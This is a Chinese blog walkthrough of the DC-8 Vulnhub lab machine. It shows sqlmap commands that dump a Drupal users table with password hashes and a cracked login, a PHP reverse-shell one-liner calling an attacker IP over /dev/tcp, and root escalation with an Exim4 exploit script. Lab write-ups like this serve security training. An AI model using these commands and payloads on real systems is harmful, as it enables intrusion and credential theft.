dc8靶机攻略

已于 2023-10-24 21:25:28 修改
阅读量57 收藏
点赞数
分类专栏: 靶机系列 文章标签: 1024程序员节 网络安全 web安全 安全
于 2023-10-24 21:25:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134022127
版权

dc8

扫描

image-20231024112928455

image-20231024113041636

image-20231024113106119

image-20231024113123961

渗透

先访问主页探查

该主页的url看似存在sql注入

image-20231024113236846

断点注入一下看看有没有报错

发现报错,存在sql注入

image-20231024113319245

使用sqlmap

爆库

sqlmap -u http://10.4.7.151 -current-db

image-20231024114115621

爆表

sqlmap -u http://10.4.7.151/?nid=2 --tables -D "d7db"

image-20231024114314802

image-20231024114328433

发现user表

爆列

sqlmap -u 'http://10.4.7.151/?nid=2' -D d7db -T users --columns

image-20231024114553883

爆数据

sqlmap -u 'http://10.4.7.151/?nid=2' -D d7db -T users -C uid,login,name,pass --dump

image-20231024114831779

admin:$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john:$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

等了许久,发现只能解出来一个

即可使用john登录

john:turtle

image-20231024203125099

在contactus中找到phpcode执行,因此写入反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.4.7.138/12138 0>&1'"); ?>

image-20231024204846541

在contactus from settings中随意写点什么提交触发一下

image-20231024204933200

成功获取连接

image-20231024205012218

提权

使用sudo无果,使用find,发现exim4

image-20231024205908299

网上搜索的资料

Exim4是一个邮件传输代理(MTA),它是Linux操作系统中的一种邮件服务器软件。Exim4的主要功能是处理电子邮件的传输和路由,它可以接收来自用户的邮件并将其发送到目标邮件地址。Exim4还支持SMTP、POP3、IMAP等邮件协议,可以与其他邮件服务器进行通信。Exim4是一个功能强大的邮件服务器软件,它在Linux系统中被广泛使用。

Exim4在某些情况下可以被滥用以提升特权,这是因为它是一个运行在特权用户(通常是root)下的邮件传输代理。如果存在安全漏洞或配置错误,攻击者可能能够利用这些问题来执行恶意代码或以root权限运行代码。

一些常见的漏洞或配置错误包括:

  1. 缓冲区溢出:如果Exim4的代码中存在缓冲区溢出漏洞,攻击者可能能够通过发送特制的恶意邮件来执行任意代码,从而提升特权。
  2. 非安全配置:如果Exim4的配置文件中存在错误或不安全的设置,攻击者可能能够利用这些配置来执行特权操作。例如,如果Exim4被配置为以root权限运行某些脚本或程序,攻击者可以通过修改这些脚本或程序来提权。
  3. 未修补的漏洞:如果Exim4的版本存在已知的漏洞,并且系统管理员没有及时修补或升级软件,攻击者可能能够利用这些漏洞来获取root权限。

查看一下exim4的版本号

image-20231024210236083

使用kali查询漏洞,找到一条符合本地提权

image-20231024210416821

下载46996.sh到本地

直接执行会报错,此处需要本地编辑用set ff=unix保存一下

image-20231024211150270

使用python3开启web服务传到靶机上的/tmp目录下,要不然权限不够,随后赋权777执行

需要使用第二个参数

./46996.sh -m netcat

随后等待五秒执行成功,获取root

flag在老地方

image-20231024212225979

order libra
关注
专栏目录
靶机DC-8(详细渗透,适合新手渗透)
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2130
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-7靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-07 894
前言 其他DC靶机攻略请查看我的其他文章。 一、DC-7的信息收集 DC-7靶机开启后,可以直接看到IP地址,我们直接nmap扫描查看一下目标开放的端口: 扫描后我们可以查看到目标开放了80与22端口,并且网站的框架采用了Drupal8(后面会有用) 访问80端口,进入网站后需要登陆 在github上DC-7给出了一个用户名与密码 可是并不能登陆 <?php $servername = "localhost"; $username = "dc7user"; $password = .
DC-4靶机攻略
真正的大师,永远都怀着一颗学徒的心。
07-27 1174
文章目录前言一、DC-4的信息收集1.确定IP,端口号;2 访问目标80端口,收集信息二、通过暴力破解密码,成功登陆1.确定密码字典,利用hydra进行爆破。三. 抓包改命令,为我所用1.分析界面2.BP抓包,修改命令3 进入用户家目录收集信息4.hydra爆破ssh账户密码。四.ssh登陆总结- - -思路 前言 在本章将介绍DC-4靶机攻略。 DC-1攻略:点击这里! DC-2攻略:点击这里! 提示:以下是本篇文章正文内容,下面案例可供参考 一、DC-4的信息收集 1.确定IP,端口号; 命令:n
DC-2靶机攻略
weixin_43179779的博客
10-16 1931
DC-2靶机攻略
DC-8靶机通关
qq_63831588的博客
08-04 712
这里我尝试找了系统里面有没有什么其他的提示性文件,以及有没有其他用户,或者是不是有一些隐藏文件之类的,结果发现什么都没有!然后我看了一下提示发现上面suid的那些命令里是有可以提权的的!这里可以上传 php 代码,这里和上一个靶机有点像,并且还不需要我们下载插件,直接就可以用!最后我们拿到了两个账号密码!不过他的密码是哈希值,需要我们爆破一下!这里跑出来了数据库名!网页长这个样子,又是熟悉的drupal!我看了提示以后发现这个可以用来提权!看了一下版本是4.89!基本可以确定是这个了!执行脚本,提权成功!
DC8靶机
qq_40646572的博客
05-13 413
信息收集 开启dc8靶机 使用nmap扫描下当前网段。发现存在dc8靶机192.168.85.139主机。且主机开启了22端口以及80端口。 打开http服务。 web——getshell 经过测试,在home页面中,点击侧边栏,存在nid参数,经过测试该处存在sql注入点。 经过测试,当前数据表存在一个字段。 使用联合注入的方式获取到当前数据库名,d7db。 获取当前数据库的表个信息。看到当前数据库存在users数据表格。 Payload= nid=-1 union select gr
DC-8靶机渗透
洛柒尘的博客
01-15 554
前言 为了学习渗透过程,因此跟着皮卡皮卡丘的个人空间学习渗透vulnhub 准备 目标:获得root权限并拿下flag 靶机:vulnhub-DC-8 链接:https://www.vulnhub.com/entry/dc-8,367/ 环境设置:下载后为ova文件,导入到VM中,将网络连接方式改为NAT 参考链接 渗透过程1 渗透过程2 渗透过程 主机发现 nmap Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) a
vulnhub之DC8靶机
LainWith的博客
02-15 3008
目录介绍信息收集主机发现主机信息探测访问网站目录扫描漏洞发现手工SQL联合查询注入1. 判断列数,得知是1列2. 数据查询&信息收集(union select)3. 获取数据库的表名4. 查询指定表名下的列名信息5. 查询指定列获取数据6. 爆破密码反弹shell提权exim4提权拿到Flag 介绍 系列: DC(此系列共10台) 发布日期:2019年9月8日 难度:中级 Flag:此挑战的最终目标是绕过双因素身份验证,获取root权限并读取唯一的Flag 学习: sql注入 网站挂马 exim4
DC-3靶机攻略
weixin_47311099的博客
07-16 465
DC-3攻略 信息收集 主机发现 nmap -sP 192.168.64.0/24 -oN nmap.sP 端口扫描 nmap -A 192.168.64.137 -p 1-65535 -oN NMAP_A 发现开放80端口 访问80 漏洞利用 安装joomla扫描工具joomscan apt-get install joomscan 查找cms版本漏洞 searchsploit Joomla 3.7.0 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-WEXzKK0O-
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8570
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全设备系列】3、IPS(入侵防御系统)
Hacker_Oldv的博客
11-22 1095
IDS和IPS的关系,并非取代和互斥,而是相互协作:没有部署IDS的时候,只能是凭感觉判断,应该在什么地方部署什么样的安全产品,通过IDS的广泛部署,了解了网络的当前实时状况,据此状况可进一步判断应该在何处部署何类安全产品(IPS等)。入侵检测系统(IDS)对那些异常的、可能是入侵行为的数据进行检测和报警,告知使用者网络中的实时状况,并提供相应的解决、处理方法,是一种侧重于风险管理的安全产品。2、旁路部署的IDS可以及时发现那些穿透防火墙的深层攻击行为,作为防火墙的有益补充,但很可惜的是无法实时的阻断。
2025职业院校技能大赛信息安全管理与评估(河北省) 任务书
Aluxian_的博客
11-22 1006
2025职业院校技能大赛信息安全管理与评估(河北省) 任务书培训环境
网络安全在数字时代保护库存数据中的作用
最新发布
网络研究观
11-26 417
网络安全对于保护数字时代的库存数据至关重要。
网络安全防范体系及设计原则
2401_88750741的博客
11-25 285
网络安全防范体系的科学性、可行性是其可顺利实施的保障。该层次的安全包括通信线路的安全,物理设备的安全,机房的安全等。作为全方位的、整体的网络安全防范体系也是分层次的,不同层次反映了不同的安全问题,根据网络的应用现状情况和网络的结构,我们将安全防范体系的层次划分为物理层安全、系统层安全、网络层安全、应用层安全安全管理。该层次的安全问题主要体现在网络方面的安全性,包括网络层身份认证,网络资源的访问控制,数据传输的保密与完整性,远程接入的安全,域名系统的安全,路由系统的安全,入侵检测的手段,网络设施防病毒等。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值